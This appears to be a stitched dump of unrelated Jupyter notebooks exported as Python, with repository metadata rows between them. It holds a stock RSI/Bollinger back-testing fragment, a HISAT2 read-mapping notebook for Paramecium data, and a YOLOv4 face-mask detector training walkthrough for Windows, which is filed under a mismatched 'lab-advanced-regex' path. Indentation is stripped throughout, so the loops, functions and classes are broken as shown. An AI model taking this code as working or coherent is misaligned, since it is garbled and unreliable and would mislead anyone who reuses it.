concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Nifty Txn details Oct_Nov-20.csv')
Consolidated_Report_df2.to_csv('D:\Personal\Analytics course\IPBA\Case Study\Output\Stock Consolidated report Sep_Nov-20.csv')
Summary_Report_df2.to_csv('D:\Personal\Analytics course\IPBA\Case Study\Output\Stock Summary report Sep_Nov-20.csv')
# #### FURTHER ANALYSIS ON BACK TESTING POST REVIEW FROM KRISHNA - TO SEE HOW THE % SPLIT WHEN DONE WEEKLY FOR ENTIRE BACK TESTING DATA - RATHER THAN DOING AS A WHOLE
## data selection for each week
mask = (daily_data['Date'] <= '2020-08-28')
daily_data_back_test = daily_data.loc[mask]
start_date = daily_data_back_test['Date'].head(1).dt.date.values[0]
end_date = daily_data_back_test['Date'].tail(1).dt.date.values[0]
end_date = end_date - dt.timedelta(days=6) # refine the end date to reflect the last week - so that we dont go beyond end date
# +
# get the date range for week start dates
from datetimerange import DateTimeRange
def dateRange(start, end, step):
rangeList = []
time_range = DateTimeRange(start, end)
for value in time_range.range(dt.timedelta(days=step)):
rangeList.append(value.strftime('%m/%d/%Y'))
return rangeList
week_start_dates = dateRange(start_date, end_date, 7)
week_start_dates
# -
# get the date range for week end dates
end_start_date = start_date + dt.timedelta(days=6)
end_end_date = daily_data_back_test['Date'].tail(1).dt.date.values[0]
week_end_dates = dateRange(end_start_date, end_end_date, 7)
week_end_dates
i = 0
portfolio_money = 1000000 # investment of 10 lakhs
available_money = 0
stock_in_portfolio = []
stock_to_sell = []
remove_stock = []
consolidated_list = []
consolidated_portfolio = pd.DataFrame([consolidated_list])
for item in week_start_dates:
week_start = week_start_dates [i]
week_end = week_end_dates [i]
mask = ((daily_data['Date'] >= week_start) & (daily_data['Date'] <= week_end))
weekly_data = daily_data.loc[mask]
weekly_data_selected = weekly_portfolio_stock_selection (weekly_data)
week_number = str("Week".join(str(i)))
if i == 0:
available_money = portfolio_money
weekly_portfolio, stock_in_portfolio, money_available = weekly_stock_buy_and_sell(weekly_data_selected, week_number, stock_in_portfolio, available_money)
consolidated_portfolio = pd.concat([consolidated_portfolio, weekly_portfolio])
available_money = money_available
i = i + 1
consolidated_portfolio = consolidated_portfolio.dropna(how='any',axis=0)
consolidated_portfolio.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Weekly Consolidated portfolio until Sep2020.csv')
# +
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 01st Oct as the price for book-closure
add_rows_list = []
row_count = consolidated_portfolio.shape[0]
i = 0
for index_row, row in consolidated_portfolio.iterrows():
if i == 0:
last_symbol = row['Symbol']
last_qty = row['Qty']
last_txn = row['Txn']
i = i + 1
else:
if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
add_rows_list.append(week_number)
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(last_symbol) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(last_qty) # qty
value = price * last_qty
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
else:
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
if ((i == row_count) and (row['Txn'] == "Buy")):
add_rows_list.append(week_number)
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(row['Symbol']) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(row['Qty']) # qty
value = price * row['Qty']
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 7
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Week#', 'Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([consolidated_portfolio, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# SUMMARIZE THE REPORTING FOR THE WEEKLY DATA
investment = 1000000 # investment of 10 lakhs
temp1_df, temp2_df = Summarize_Report_Weekly("Stock - prior to Sep'20", "Portfolio2: RSI-Bollinger", "Bollinger Middle Band; RSI > 25", concat_Buy_Sell)
Consolidated_Report_df2 = pd.concat([Consolidated_Report_df2, temp1_df], ignore_index=True)
Summary_Report_df2 = pd.concat([Summary_Report_df2, temp2_df], ignore_index=True)
Consolidated_Report_df2.head(40)
Summary_Report_df2.head(40)
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Portfolio2 RSI 25 Bollinger Weekly Buy_Sell list.csv')
| 205,216 |
/notebooks/Therese/IterativeMappingDcr1KD.ipynb
|
559f4487bc895be5f9c97a3572f24b5073ee098d
|
[
"MIT"
] |
permissive
|
VCMason/PyGenToolbox
|
https://github.com/VCMason/PyGenToolbox
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 34,823 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# %load_ext autoreload
# %autoreload 2
import os
import glob
import datetime
import subprocess
print(datetime.datetime.now())
from pygentoolbox import ReadMapping_v2
# need pygentoolbox.Tools also
#dir(pygentoolbox.Tools)
# %matplotlib inline
import matplotlib.pyplot as plt
# +
# First map seqs to L4440 EV vector, only keep unmapped reads, then remove and reads mapping to Dcr1 before calculating total mapped reads to Mac genome
# define variables:
# cell 1
forward = ['ADPF111_23bp_NoL4440.fastq.gz'] # 'ADPF111_R1_23bp.fastq.gz', 'ADPF111_R1_25bp.fastq.gz' # , 'EV_L4_L12_R1.fastq.gz']
reverse = ['NA', 'NA'] #, 'EV_L4_L12_R2.fastq.gz']
directory='/media/sf_LinuxShare/Projects/Theresa/Hisat2/Dcr1_KD/Pt_51_Mac/KD/'
cleanreads=True # are .fastq.gz reads already clean? if True skip fastp
paired=False
reference='/media/sf_LinuxShare/Ciliates/Genomes/Hisat2_Indexes/Pt_51_Mac'
skipsteps=[]
hisat_args='-p2'
#hisat_args='-p2 --no-softclip'
#hisat_args='-p 2 --no-softclip --pen-noncansplice 0 --known-splicesite-infile /media/sf_LinuxShare/Ciliates/Genomes/Annotations/ss.IES.pt_51_MacAndIES.tsv'
print(datetime.datetime.now())
# +
from pygentoolbox import ReadMapping
#fileextension='.fastq.gz'
#directory='/media/sf_LinuxShare/Projects/Ryuma/hisat2/2018-09-19_L1-4_ADPF-29_inserts'
#cleanreads=True # are .fastq.gz reads already clean? if True skip fastp
#reference='/media/sf_LinuxShare/Ciliates/Genomes/Hisat2_Indexes/Pt_51_Mac'
print(datetime.datetime.now())
#ReadMapping.main(forward, reverse, directory, cleanreads, paired, reference)
ReadMapping_v2.main(forward, reverse, directory, hisat_args, skipsteps, paired, reference)
print(datetime.datetime.now())
# +
reference='/media/sf_LinuxShare/Ciliates/Genomes/Hisat2_Indexes/Pt_51_MacAndIES'
from pygentoolbox import ReadMapping
#fileextension='.fastq.gz'
#directory='/media/sf_LinuxShare/Projects/Ryuma/hisat2/2018-09-19_L1-4_ADPF-29_inserts'
#cleanreads=True # are .fastq.gz reads already clean? if True skip fastp
#reference='/media/sf_LinuxShare/Ciliates/Genomes/Hisat2_Indexes/Pt_51_Mac'
ReadMapping.main(forward, reverse, directory, cleanreads, paired, reference)
print(datetime.datetime.now())
# -
| 2,455 |
/lab-advanced-regex.ipynb
|
a0ef2be1a7e8ba3a1ad13228ca07a480c603f84c
|
[] |
no_license
|
imanollaconcha/unit_3
|
https://github.com/imanollaconcha/unit_3
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 13,408 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] colab_type="text" id="FomalLunMPYp"
# # <font style="color:blue">Mask / No Mask Detector - YOLO v4 - Windows</font>
# In this notebook we will train a custom object detector using YOLO v4, Specially a face mask detector.
#
# Just for your consideration, we will be creating a folder named YOLO. In the parent directory is located this notebook, but all other files are inside the YOLO folder.
#
# On the other hand, we will be working with Visual Studio 2019. So you will have to make this minor change in cmake to work. Remember to fix the architecture if you are not using Visual Studio 2019 (default in other is 32-bits, we will be working on 64-bits).
#
# Pre-requisites for this to work faster is to install CUDA Toolkit and cudnn libraries from the NVIDIA website.
#
# The results of this windows machine where over a NVIDIA GeForce 1660Ti.
#
# **NOTES**:
# - *POWERSHELL DOWNLOADING PRETRAINED WEIGHTS TO TEST THE COMPILATION OF DARKNET IS REALLY SLOW, YOU WILL PREFFER TO DO IT MANUALLY*
# - *THE OUTPUTS OF THE TRAINING ARE CLEARED, WE SHARED TO YOU THE RESULTS AND THE PRE-TRAINED WEIGHT, SEE THE README.MD*
# -
# ### <font color="blue">0. Importing and Helper Functions </font>
#
# In this section we will make use of our helper functions that will ease the use over the entire notebook.
# Just some imports:
# - os : path handling
# - cv2: image processing
# - IPython: for audio play
# - datetime: for getting the timestamp
# - random: for shuflying data
# - subprocess: for calling functions of the system
import random
import os
import subprocess
import sys
import cv2
import matplotlib.pyplot as plt
from IPython.display import Audio
from datetime import datetime
# %matplotlib inline
# This is where a nice soundwave is located on the machine for just tell us when the training ended or when processing YOLO video when it ends to patch the video with the predictions.
#
# Trainings vary from 2 hrs to 30 hrs so is good if you are near to hear that it finished.
sound_file = 'C:\Windows\Media\Ring10.wav'
# The utility function below will help us to display the test image and its predicted labels, also will save the picture on the results folder
# + colab={} colab_type="code" id="qLFSmTDSFeMc"
# Utility function to display the output
def display_output(imagePath):
src = cv2.imread(imagePath,1)
output = cv2.imread("predictions.jpg")
plt.figure(figsize=[20,8])
plt.subplot(121)
plt.imshow(src[:,:,::-1])
plt.title("Original Image")
plt.subplot(122)
plt.imshow(output[:,:,::-1])
plt.title("Predictions")
file_name = imagePath.split('\\')
file_name_parts = file_name[2].split('.')
name_only = file_name_parts[0]
now = datetime.now() # current date and time
build = now.strftime("%m-%d-%Y_%H_%M_%S")
file_save_path = os.path.join(file_name[0], 'result', 'yolov4')
save_name = os.path.join(file_save_path, name_only + '-yolov4--' + build +'.png')
plt.savefig(save_name)
plt.show()
# -
# This class will help us to read a file and modify their lines in a easy way. An example of usage is in comments below. On the other hand you will use it on the entire document.
# +
# Utility class to modify files
# Get a file handler
# mkf = FileMod(doc='.\Makefile')
# Load the file and view the line numbers
# mkf.load(doc='.\Makefile')
# make a dictionary to modify the file
# mkf_dict = dict({
# 0:'GPU=1',
# 2: 'CUDNN_HALF=1'
# })
# mkf.mod(doc='.\Makefile', mod_lines=mkf_dict)
# view the print out without line numbers (optional)
# mkf.view() # view 20 lines
# ... or ...
# mkf.view(10) # view 10 lines
class FileMod():
def __init__(self, doc=None, *args, **kwargs):
super(FileMod, self).__init__()
self.mode = 'r' # default = read
self.file = doc # path of file
self.dict = {} # dict to modify
self.lines = [] #lines of file
def load(self, doc=None):
try:
if doc==None:
doc=self.file
with open(doc, self.mode) as file:
# read a list of lines into data
data = file.readlines()
self.lines = data
for i, string in enumerate(self.lines):
print(f"{i}:{string}")
except Exception as e:
print(e)
def mod(self, mod_lines=None):
# and write everything back
if mod_lines == None:
return
doc = self.file
self.mode = 'w'
for lines, data in mod_lines.items():
string = data + '\n'
self.lines[lines] = string
print(f"mod {lines} as {string}")
with open(doc, 'w') as file:
file.writelines(self.lines)
self.mode = 'r'
def view(self, lines=None):
if lines == None:
lines = 20
doc = self.file
with open(doc, self.mode) as file:
# read a list of lines into data
data = file.readlines()
for line_num, line in enumerate(data):
if line_num > lines - 1:
break
print(f"{line}\n")
# -
# In each step I am doing a dummy *ls* for seein in which folder we are
# %ls
# We will then create a folder named *YOLO* and will start working from here
# %mkdir YOLO
# %cd YOLO
# + [markdown] colab_type="text" id="hY4n3LaTPAeh"
# ### <font color="blue">1. Download Alexey AB YOLO repository to our google drive *yolov4* folder</font>
# We now will download the well maintained repository of a YOLO expert, because Joseph Redmon will not continue working on YOLO and because this repo work very well on Windows.
# + colab={"base_uri": "https://localhost:8080/", "height": 153} colab_type="code" executionInfo={"elapsed": 35335, "status": "ok", "timestamp": 1591401817040, "user": {"displayName": "Rangel Alvarado", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GgrnIdLDrC0TrgBX38dBKASDPlPC_cVM2-325_j=s64", "userId": "11539925403577826856"}, "user_tz": 300} id="h6YQz3eIOzVG" outputId="31d3ce46-9ec5-45ed-f230-75f5b4951336"
# !git clone https://github.com/AlexeyAB/darknet.git
# + [markdown] colab_type="text" id="9OaFsPQ6SZQU"
# ### <font color="blue">2. Compile Darknet</font>
# Next, some strings on the Makefile needs to be modified before we build darknet from the source.
# -
# %ls
# %cd darknet\build
mkf = FileMod('..\Makefile')
mkf.load()
mkfdict = dict({
0:'GPU=1',
1:'CUDNN=1',
3:'OPENCV=1',
4:'AVX=1'
})
mkf.mod(mod_lines=mkfdict)
mkf.view()
# %ls
# + colab={"base_uri": "https://localhost:8080/", "height": 34} colab_type="code" executionInfo={"elapsed": 130508, "status": "ok", "timestamp": 1591401923096, "user": {"displayName": "Rangel Alvarado", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GgrnIdLDrC0TrgBX38dBKASDPlPC_cVM2-325_j=s64", "userId": "11539925403577826856"}, "user_tz": 300} id="v6JW5I2BSo6v" outputId="361fb0ea-2474-431b-a3b1-24835c523d14"
print("[INFO] - Building Darknet with cmake")
# !cmake -G "Visual Studio 16 2019" ..
# -
print("[INFO] - Building Darknet Release Mode")
# !cmake --build . --target ALL_BUILD
print("[INFO] - End of building darknet!")
print("[INFO] - Final Steps")
# !cmake --build . --target INSTALL
print("[INFO] - You are done for start training or detecting!")
# ### <font color="blue">3. Move DLLs To The Root Folder of Darknet</font>
#
# Darknet will need phtreadVC2.dll to load correctly so we will be putting it on the root of the darknet folder for simplifying things.
# %cd ..\
# %ls
# !copy 3rdparty\pthreads\bin\* .
# + [markdown] colab_type="text" id="vGt0Mlik2uOM"
# ### <font color="blue">4. Cloning the Pre-Trained Weights</font>
# We will be doing a compilation test with the pre-trained weights of YOLO v4 (just this time).
# -
# %ls
# + colab={"base_uri": "https://localhost:8080/", "height": 377} colab_type="code" executionInfo={"elapsed": 142975, "status": "ok", "timestamp": 1591402066242, "user": {"displayName": "Rangel Alvarado", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GgrnIdLDrC0TrgBX38dBKASDPlPC_cVM2-325_j=s64", "userId": "11539925403577826856"}, "user_tz": 300} id="0q662XkF3BfP" outputId="d1dbfa3e-46e7-4963-c08b-a6f27c132b20"
# We will download the pre-trained weights of yolov4 just this time to test the darknet compilation
# This will take a lot of time, you preferibly will want to do it manually
# !powershell -c "(New-Object System.Net.WebClient).DownloadFile('https://github.com/AlexeyAB/darknet/releases/download/darknet_yolo_v3_optimal/yolov4.weights', 'yolov4.weights')"
Audio(sound_file, autoplay=True)
# -
# ### <font color="blue">5. Test The Compilation</font>
#
# If everything is OK, in predictions.jpg you will get the image with their bounding boxes and classifications of the classes detected by yolo.
# !darknet detect cfg\yolov4.cfg yolov4.weights data\dog.jpg -dont_show > NUL
# + [markdown] colab_type="text" id="hXnzCOgpT9hc"
# ### <font color="blue">6. Download the *Mask / No Mask Dataset*</font>
# Download the curated dataset of face mask and not facemask to our dataset folder, but first lets create a dataset folder.
#
# Usually i like to be very organized.
# + colab={"base_uri": "https://localhost:8080/", "height": 51} colab_type="code" executionInfo={"elapsed": 15654, "status": "ok", "timestamp": 1591401938802, "user": {"displayName": "Rangel Alvarado", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GgrnIdLDrC0TrgBX38dBKASDPlPC_cVM2-325_j=s64", "userId": "11539925403577826856"}, "user_tz": 300} id="v_tq7-MxUUer" outputId="134c4ba8-7dcb-4473-86d1-377492b8599c"
# %ls
# -
# %cd ../
# Next we will download the dataset to this root folder *YOLO*, decompress it on another folder called *dataset* and finally erase the zip file.
# !powershell -c "(New-Object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/6gewe947ake1g95/kaggle_and_no-mask_dataset.zip?dl=1', '.\kaggle_and_no-mask_dataset.zip')"
# !powershell -c "expand-archive -path 'kaggle_and_no-mask_dataset.zip' -destinationpath 'dataset'"
# !powershell -c "remove-item -path 'kaggle_and_no-mask_dataset.zip'"
# + [markdown] colab_type="text" id="kbVA4YIxZjac"
# ### <font color="blue">7. Prepare the Train and Test Files</font>
# This code provided creates two files, one for the training images and other for the test images.
#
# The dataset is divided in:
# - 80% training set
# - 20% test set
# -
# %ls
# + colab={} colab_type="code" id="tMqbf915Zi14"
image_dir = "dataset"
f_val = open("DS_test.txt", 'w')
f_train = open("DS_train.txt", 'w')
path, dirs, files = next(os.walk(image_dir))
data_size = len(files)
ind = 0
data_test_size = int(0.2 * data_size)
test_array = random.sample(range(data_size), k=data_test_size)
for f in os.listdir(image_dir):
if(f.split(".")[-1] == "jpg"):
ind += 1
if ind in test_array:
f_val.write(image_dir+'/'+f+'\n')
else:
f_train.write(image_dir+'/'+f+'\n')
f_train.close()
f_val.close()
# + [markdown] colab_type="text" id="jLrGjXfgftkD"
# ### <font color="blue">8. Prepare and Upload the configuration files</font>
#
# For train and use yolo we need to prepare the neccesary files, finally we will upload to our yolov4 folder.
#
# #### <font color="blue">8.1. Data Setup</font>
# In the file **`yolov4-mask_nomask-setup.data`**(uploaded to github and included here), we provided the correct specification of our paths.
#
# Below is the content of this file:
# ```
# classes = 2
# train = DS_train.txt
# valid = DS_test.txt
# names = FacialMaskDetector/yolov4/config/yolov4.names
# backup = FacialMaskDetector/yolov4/backup/
# ```
#
# #### <font color="blue">8.2. Training Config File</font>
# We also need to provide the **`yolov4-mask_nomask-train.cfg`**. Based on the default file of darknet folder cfg/yolov4.cfg
#
# #### <font color="blue">8.2.1 Batch hyper-parameter in YOLOv4</font>
# We maintain the batch size and the subdivision batch as the default of the file. That's 20 images to feed in two subgroups.
#
# For the *test configuration file* we will set these params to 1 because we will feed an image.
# ```
# batch=20
# subdivisions=10
# ```
# #### <font color="blue">8.2.2 Subdivisions configuration parameter in YOLOv4</font>
# For feeding the GPU correcly we slow the training, this action will ensure our machine will be able to train the detector but you could play with this parameter.
#
# In testing mode this will be equal to 1.
#
# ### <font color="blue">8.2.3 Width, Height, Channels</font>
# A higher resolution the detection will be better but you will sacrifice the time of training.
# ```
# width=352
# height=352
# channels=3
# ```
# ### <font color="blue">8.2.4 Momentum and Decay</font>
# These hyperparameters we will maintain as is.
# ```
# momentum=0.949
# decay=0.0005
# ```
#
# ### <font color="blue">8.2.5 Learning Rate, Steps, Scales, Burn In (warm-up)</font>
# Again, we will be maintaining these hyperparamters as default. The learning rate will be changed over the 800th iteration.
#
# ```
# learning_rate=0.0013
# policy=steps
# steps=6000
# scales=.1,.1
# burn_in=600
# ```
#
#
# ### <font color="blue">8.2.6 Data augmentation</font>
# For various lighting conditions and different color ranges (over other color spaces). Sometimes its good to change the angle because a few objects could be rotated. A facemask in this case we will maintain at 0 degrees but could be augmented to 3° or something low because we are detecting people.
# ```
# angle=0
# saturation = 1.5
# exposure = 1.5
# hue=.1
# ```
#
# #### <font color="blue">8.2.7 Number of iterations</font>
# Process 2000*n_classes iterations run as recommended. But we will keep in a higher number to see the performance.
# ```
# max_batches=6000
# ```
#
# #### <font color="blue">8.2.8 Change filters parameter in conv layers [Important for multiple objects]</font>
# Fini in the file the conv. layer before the yolo layer with the equation:
#
# **`filters=( classes + 5 ) * 3`**
#
# Our yolo classes are 2, so filters = 21.
#
# ### <font color="blue">8.3. yolov4.names file </font>
# Specify the classes as...
# - Mask (Class 0),
# - No-Mask (Class 1)
#
# ... class labels.
#
# ### <font color="blue">8.4. Improving The Network </font>
# We observed that on the AlexeyAB repo recommended change some hyperparameters for improving the training accuracy. These parameters modified are:
# - stride=4, near line 890
# - layers=23, near line 894
# - added max=200 or above at the end of the file
# + [markdown] colab_type="text" id="1ZDW77yt0BlX"
# ### <font color="blue">9. Cloning the configuration Repository</font>
# This repository is prepared with the desired configuration for yolov3 and yolov4.
#
# In this case we will be using yolo v4. The structure of the folder is as follows:
#
# ```
# /FacialMaskDetector
# ├── results
# │ ├── yolov3
# │ │ ├── README.md
# │ ├── yolov4
# │ ├── README.md
# ├── test
# │ ├── test-image1.jpg
# │ ├── test-image2.jpg
# │ ├── test-image3.jpg
# │ ├── test-image4.jpg
# │ ├── test-video1.jpg
# │ ├── test-video2.jpg
# ├── yolov3
# │ ├── backup
# │ │ ├── README.md
# │ ├── config
# │ │ ├── yolov3-mask_nomask-setup.data
# │ │ ├── yolov3-mask_nomask-test.cfg
# │ │ ├── yolov3-mask_nomask-train.cfg
# │ │ ├── yolov3.names
# │ ├── weights
# │ ├── README.md
# ├── yolov4
# │ ├── backup
# │ │ ├── README.md
# │ ├── config
# │ │ ├── yolov4-mask_nomask-setup.data
# │ │ ├── yolov4-mask_nomask-test.cfg
# │ │ ├── yolov4-mask_nomask-train.cfg
# │ │ ├── yolov4.names
# │ ├── weights
# │ ├── README.md
# ├── README.md
# ```
#
# This will ease for us the way of training and inference.
# -
# %ls
# + colab={"base_uri": "https://localhost:8080/", "height": 119} colab_type="code" executionInfo={"elapsed": 118337, "status": "ok", "timestamp": 1591402041573, "user": {"displayName": "Rangel Alvarado", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GgrnIdLDrC0TrgBX38dBKASDPlPC_cVM2-325_j=s64", "userId": "11539925403577826856"}, "user_tz": 300} id="8xjRp_7shXlH" outputId="94c160f9-e717-41fa-e595-c714c61fdc27"
# !git clone https://github.com/issaiass/FacialMaskDetector.git
# -
# We need to download the initial weights
# %cd FacialMaskDetector\yolov4\weights
# !powershell -c "(New-Object System.Net.WebClient).DownloadFile('"https://github.com/AlexeyAB/darknet/releases/download/darknet_yolo_v3_optimal/yolov4.conv.137"', 'yolov4.conv.137')"
Audio(sound_file, autoplay=True)
# %cd ..\..\..\
# + [markdown] colab_type="text" id="K-8dgvHU3ueH"
# ### <font color="blue">10. Review Hyperparameters</font>
#
# Here we will set the hyperparamters for training the YOLO v4 model.
# Below python variables to be the shortcut for fast insertion on the code.
# -
yolo_setup = 'FacialMaskDetector\\yolov4\\config\\yolov4-mask_nomask-setup.data'
yolo_train = 'FacialMaskDetector\\yolov4\\config\\yolov4-mask_nomask-train.cfg'
yolo_test = 'FacialMaskDetector\\yolov4\\config\\yolov4-mask_nomask-test.cfg'
yolo_weights = 'FacialMaskDetector\\yolov4\\weights\\yolov4.conv.137'
yolo_best_weights = 'FacialMaskDetector\\yolov4\\backup\\yolov4-mask_nomask-train_best.weights'
# %ls
CfgHandler = FileMod(yolo_train)
CfgHandler.load()
# Enable if you want to modify something in the file. If you didn't know what linew we changed, but its obvious, you could check at:
# - https://www.diffnow.com/
# - https://text-compare.com/Enable if you want to modify something in the file. If you didn't know what linew we changed, but its obvious, you could check at https://www.diffnow.com/
# +
# # DEFAULT
#config = dict({ 1:'batch=20', # 64
# 2:'subdivisions=10', # 8
# 6:'width=320', # 512
# 7:'height=320', # 512
# 19:'learning_rate=0.0013', # 0.0013
# 17:'burn_in=600', # 1000
# 18:'max_batches=6000', # 500500
# 20:'steps=4800,5400', # 400000,450000
# 21:'scales=.1,.1' # .1,.1
# 890:'stride=4' # 2
# 894:'layers=23' # 54
# 960:'filters=21' # 255
# 967:'classes=2' # 80
# 988:'stride=4' # 2
# 1048:'filter=21' # 255
# 1055:'classes=2' # 80
# 1136:'filters=21' # 255
# 1143:'classe=2' # 80
# 1157:'max=200' # <just leav it in blank with ''>
# })
#CfgHandler.mod('FacialMaskDetector/yolov4/config/yolov4-mask_nomask-train.cfg', config)
# -
CfgHandler.view(22)
# + [markdown] colab_type="text" id="XeCpPyeiz5Bt"
# ### <font color="blue">11. Start Training </font>
# We need to pass the training files for the darknet framework to start the process.
#
# Remember!, we need to specify the complete paths of these files that we talked before:
# 1. setup file,
# 1. config file,
# 1. convolutional weights file
#
# There are a few flags like **`dont_show`** which wont display the graphs and **`map`** - for the mAP calculation over the DS_test.txt file (20% of our data).
# + colab={"base_uri": "https://localhost:8080/", "height": 34} colab_type="code" executionInfo={"elapsed": 1946, "status": "ok", "timestamp": 1591402709592, "user": {"displayName": "Rangel Alvarado", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GgrnIdLDrC0TrgBX38dBKASDPlPC_cVM2-325_j=s64", "userId": "11539925403577826856"}, "user_tz": 300} id="5R2PbMvqHA-o" outputId="a1d94c64-df34-4516-80fd-3524723b900c"
# %ls
# -
# Below the paths to insert as a variable in the command line as arguments, and to not repeat in the entire notebook
# We added an audio sound file, if you are near you will hear a ring tone.
#
# This is the same as:
#
# *!darknet\darknet detector train FacialMaskDetector\yolov4\config\yolov4-mask_nomask-setup.data FacialMaskDetector\yolov4\config\yolov4-mask_nomask-train.cfg FacialMaskDetector\yolov4\weights\yolov4.conv.137 -dont_show -map 2 > train_log.txt*
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} colab_type="code" executionInfo={"elapsed": 21950875, "status": "ok", "timestamp": 1591424659111, "user": {"displayName": "Rangel Alvarado", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GgrnIdLDrC0TrgBX38dBKASDPlPC_cVM2-325_j=s64", "userId": "11539925403577826856"}, "user_tz": 300} id="zK145Zz00pho" outputId="ceba2823-323e-424c-ea57-476ff7b67574"
# Train!
# !darknet\darknet detector train $yolo_setup $yolo_train $yolo_weights -dont_show -map 2 > train_log.txt
Audio(sound_file, autoplay=True)
# + [markdown] colab_type="text" id="y0nACB5u96Qy"
# Our results:
# - class_id = 0, name = Mask, ap = 92.92% (TP = 490, FP = 56)
# - class_id = 1, name = No-Mask, ap = 75.62% (TP = 725, FP = 92)
#
# - for conf_thresh = 0.25, precision = 0.89, recall = 0.75, F1-score = 0.82
# - for conf_thresh = 0.25, TP = 1215, FP = 148, FN = 396, average IoU = 70.59 %
#
# - IoU threshold = 50 %, used Area-Under-Curve for each unique Recall
# - mean average precision ([email protected]) = 0.842709, or 84.27 %
#
#
# And the training time was about less than 8 hours depending of the max_batches and width x height of the configuration in the yolo training file.
# + [markdown] colab_type="text" id="0dNCxx904F24"
# ### <font color="blue">12. Make Inferences</font>
#
# First we did a first step that is to copy the data folder of darknet to the root, because inside are the labels to graph the letters and numbers. If this step is omited you will see a black box and no inference name.
#
# Next we will have a piece of code for displaying and finally are the inferences of images and pre-recorded video.
#
# The pre-recorded video could be downloaded over the root folder, in this case, our YOLO folder (created on Google Drive)
# -
# %ls
# !mkdir data
# !Xcopy /E /I darknet\data\* data
# + [markdown] colab_type="text" id="4CBm0hURLVXm"
# Below we will list the test files
# -
test_files = [os.path.join('FacialMaskDetector\\test', v) for v in os.listdir('FacialMaskDetector\\test')]
# + [markdown] colab_type="text" id="wIv4_my88HAx"
# #### <font color="blue">12.1 Scenario 1</font>
#
# Testing only with one man and with facemask.
# -
# !darknet\darknet detector test $yolo_setup $yolo_test $yolo_best_weights FacialMaskDetector\test\test-image1.jpg -thresh .6 2 > NUL
display_output(test_files[0])
# + [markdown] colab_type="text" id="Z5nqfcco8W2w"
# #### <font color="blue">12.2 Scenario 2</font>
#
# Testing with different angles of people wearing mask and other not wearing.
# + colab={"base_uri": "https://localhost:8080/", "height": 484} colab_type="code" executionInfo={"elapsed": 13659, "status": "ok", "timestamp": 1591426397186, "user": {"displayName": "Rangel Alvarado", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GgrnIdLDrC0TrgBX38dBKASDPlPC_cVM2-325_j=s64", "userId": "11539925403577826856"}, "user_tz": 300} id="Wgvua3eJgtpn" outputId="fa52184d-6c95-417d-d449-e58aa275bfb4"
# !darknet\darknet detector test $yolo_setup $yolo_test $yolo_best_weights FacialMaskDetector\test\test-image2.jpg -thresh .6 2 > NUL
# -
display_output(test_files[1])
# + [markdown] colab_type="text" id="fFkEby8I8jr3"
# #### <font color="blue">12.3 Scenario 3</font>
#
# Testing with a crowd with and without facemask and different scales and variations
# + colab={"base_uri": "https://localhost:8080/", "height": 679} colab_type="code" executionInfo={"elapsed": 21960396, "status": "ok", "timestamp": 1591424718897, "user": {"displayName": "Rangel Alvarado", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GgrnIdLDrC0TrgBX38dBKASDPlPC_cVM2-325_j=s64", "userId": "11539925403577826856"}, "user_tz": 300} id="vCbtSEtAgu6E" outputId="3bb14371-ec93-46ac-da24-33cb00d715c9"
# !darknet\darknet detector test $yolo_setup $yolo_test $yolo_best_weights FacialMaskDetector\test\test-image3.jpg -thresh .6 2 > NUL
# -
display_output(test_files[2])
# + [markdown] colab_type="text" id="QHxgZ_su8zn4"
